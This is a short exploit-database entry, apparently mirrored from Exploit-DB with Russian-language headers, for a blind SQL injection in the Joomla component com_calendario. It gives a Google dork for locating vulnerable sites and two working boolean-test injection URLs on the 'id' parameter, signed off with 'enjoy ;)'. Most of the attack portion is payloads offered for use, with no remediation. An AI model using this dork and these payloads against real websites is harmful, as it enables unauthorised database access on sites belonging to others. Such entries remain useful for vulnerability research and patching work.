Exploit Joomla! Component com_calendario - Blind SQL Injection

[Exploiter]

EDB-ID

10760

Проверка EDB

1. Пройдено

Автор

MR.TRO0OQY

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

N/A

Дата публикации

2009-12-28

Joomla Component com_calendario Blind SQL injection Vulnerability

author : Mr.tro0oqy --> yemeni hacker

email : t.4@windowslive.com

dork: inurl:index.php?option=com_calendario


exp :

http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true


http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false


enjoy ;)